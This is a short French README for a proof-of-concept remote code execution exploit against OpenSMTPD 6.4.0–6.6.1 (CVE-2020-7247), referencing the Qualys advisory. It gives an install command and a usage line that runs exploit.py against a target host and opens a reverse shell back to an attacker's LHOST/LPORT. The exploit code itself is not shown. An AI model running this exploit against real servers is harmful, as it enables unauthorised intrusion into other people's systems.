
Preuve de concept d'exploit d'exécution de code à distance ciblant OpenSMTPD versions 6.4.0 à 6.6.1, livrant un shell inversé via des commandes SMTP forgées.
Exploit PoC pour OpenSMTPD 6.4.0 < 6.6.1 - Exécution de code à distance, écrit par f4T1H, inspiré par QTranspose.
Référence : https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt
pip3 install pwntools
python3 exploit.py <RHOST> <RPORT> <recipient_mail> <LHOST> <LPORT>
